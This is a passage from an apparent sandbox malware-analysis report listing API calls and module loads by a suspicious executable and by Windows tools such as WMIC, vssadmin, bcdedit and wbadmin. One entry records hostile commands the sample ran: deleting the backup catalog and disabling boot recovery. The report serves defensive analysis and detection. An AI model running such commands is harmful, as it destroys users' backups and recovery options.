\"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter DllCanUnloadNow (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter IEDllLoader (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CoInternetGetSession (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CopyBindInfo (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateURLMoniker (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter RegisterBindStatusCallback (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter ReleaseBindInfo (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter RevokeBindStatusCallback (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter UrlMkGetSessionOption (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateUri (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CoInternetCombineUrl (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CoInternetGetSecurityUrl (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter IsValidURL (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter InternetCrackUrlW (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter InternetCreateUrlW (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter IUnknown_QueryService (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter HeapSetInformation (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetThreadPreferredUILanguages (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SetThreadPreferredUILanguages (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLocaleName (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter EtwRegisterTraceGuidsW (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter EtwUnregisterTraceGuids (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00003644)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004152)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004152)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00001204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00001204)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003540)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e002203636b@ADVAPI32.dll\"\n \"0d000e00fe02636b@ADVAPI32.dll\"\n \"0b000c00cc02636b@ADVAPI32.dll\"\n \"10001100da02636b@ADVAPI32.dll\"\n \"15001600c03edf69@ADVAPI32.dll\"\n \"0e000f00703fdf69@ADVAPI32.dll\"\n \"0e000f00cc3fdf69@ADVAPI32.dll\"\n \"11001200b447df69@ADVAPI32.dll\"\n \"110012004848df69@ADVAPI32.dll\"\n \"120013008c48df69@ADVAPI32.dll\"\n \"12001300e448df69@ADVAPI32.dll\"\n \"14001500386edf69@ADVAPI32.dll\"\n \"14001500506edf69@ADVAPI32.dll\"\n \"14001500686edf69@ADVAPI32.dll\"\n \"17001800806edf69@ADVAPI32.dll\"\n \"0d000e00986edf69@ADVAPI32.dll\"\n \"11001200a86edf69@ADVAPI32.dll\"\n \"11001200bc6edf69@ADVAPI32.dll\"\n \"0f001000fc6fdf69@ADVAPI32.dll\"\n \"140015003c70df69@ADVAPI32.dll\"\n \"140015005470df69@ADVAPI32.dll\"\n \"0c000d009c70df69@ADVAPI32.dll\"\n \"0c000d00ac70df69@ADVAPI32.dll\"\n \"0e000f00bc70df69@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75630000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75630000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75630000\n \"vssadmin.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75630000\n \"WMIC.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75630000\n \"bcdedit.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75630000\n \"wbadmin.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75630000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 63CB0000\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64460000\n \"svchost.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64460000\n \"svchost.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 63CB0000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"svchost.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C wbadmin delete catalog -quiet\" - (UID: 00000000-00004160)\n \"cmd.exe\" called \"CreateProcessW\" with parameter \"bcdedit /set {default} recoveryenabled no\" - (UID: 00000000-00004152)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"svchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32\" at base 75fa0000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"svchost.exe\" loaded module \"ADVAPI32.DLL\" at base 75310000\n \"svchost.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6b560000\n \"svchost.exe\" loaded module \"SHLWAPI.DLL\" at base 75780000\n \"svchost.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"svchost.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"svchost.exe\" loaded module \"VERSION.DLL\" at base 74210000\n \"svchost.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 63cb0000\n \"svchost.exe\" loaded module \"USER32.DLL\" at base 76ff0000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"svchost.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"svchost.exe\" loaded module \"MSCOREE.DLL\" at base 6b5f0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"svchost.exe\" loaded module \"PSAPI.DLL\" at base 753e0000\n \"svchost.exe\" loaded module \"KERNEL32.DLL\" at base 75fa0000\n \"svchost.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 628a0000\n \"svchost.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"svchost.exe\" loaded module \"OLE32.DLL\" at base 75bb0000\n \"svchost.exe\" loaded module \"CRYPTBASE.DLL\" at base 74c70000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 6b510000\n \"svchost.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 69c90000\n \"svchost.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 61e40000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 74c00000\n \"svchost.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DRAWING\\F7568D7F1B9D356F64779B4C0927CFB3\\SYSTEM.DRAWING.NI.DLL\" at base 67f10000\n \"svchost.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.WINDOWS.FORMS\\C9A4CBC00F690A9E3CDDFC400F6E85BB\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 60fd0000\n \"svchost.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 69ee0000\n \"svchost.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"svchost.exe\" loaded module \"SHELL32.DLL\" at base 760c0000\n \"svchost.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\NTDLL.DLL\" at base 0\n \"svchost.exe\" loaded module \"NTDLL.DLL\" at base 76e70000\n \"svchost.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\PSAPI.DLL\" at base 0\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 757e0000\n \"svchost.exe\" loaded module \"CRYPTSP.DLL\" at base 74780000\n \"svchost.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 74d10000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75fa0000\n \"svchost.exe\" loaded module \"SETUPAPI.DLL\" at base 75d60000\n \"svchost.exe\" loaded module \"OLEAUT32.DLL\" at base 75f00000\n \"svchost.exe\" loaded module \"COMCTL32.DLL\" at base 73c70000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a420000\n \"svchost.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.SERV759BFB78#\\434D944356EF49383DE75240670CD55F\\SYSTEM.SERVICEPROCESS.NI.DLL\" at base 69d20000\n \"vssadmin.exe\" loaded module \"CLBCATQ.DLL\" at base 76d10000\n \"vssadmin.exe\" loaded module \"CRYPTSP.DLL\" at base 74780000\n \"vssadmin.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74510000\n \"vssadmin.exe\" loaded module \"KERNEL32.DLL\" at base 75fa0000\n \"vssadmin.exe\" loaded module \"ADVAPI32.DLL\" at base 75310000\n \"vssadmin.exe\" loaded module \"CRYPTBASE.DLL\" at base 74c70000\n \"vssadmin.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 74d10000\n \"vssadmin.exe\" loaded module \"%WINDIR%\\SYSTEM32\\VSS_PS.DLL\" at base 6c4d0000\n \"vssadmin.exe\" loaded module \"OLE32.DLL\" at base 75bb0000\n \"vssadmin.exe\" loaded module \"OLEAUT32.DLL\" at base 75f00000\n \"WMIC.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"WMIC.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WMIC.exe\" loaded module \"KERNEL32\" at base 75fa0000\n \"WMIC.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WMIC.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75fa0000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSXML3.DLL\" at base 60670000\n \"WMIC.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75020000\n \"WMIC.exe\" loaded module \"ADVAPI32.DLL\" at base 75310000\n \"WMIC.exe\" loaded module \"URLMON.DLL\" at base 750b0000\n \"WMIC.exe\" loaded module \"WININET.DLL\" at base 75900000\n \"WMIC.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 74de0000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73af0000\n \"WMIC.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL\" at base 71c10000\n \"WMIC.exe\" loaded module \"CRYPTSP.DLL\" at base 74780000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74510000\n \"WMIC.exe\" loaded module \"CRYPTBASE.DLL\" at base 74c70000\n \"WMIC.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 74d10000\n \"WMIC.exe\" loaded module \"%COMMONPROGRAMFILES%\\MICROSOFT SHARED\\OFFICE14\\MSOXMLMF.DLL\" at base 6b530000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMSVC.DLL\" at base 6e580000\n \"WMIC.exe\" loaded 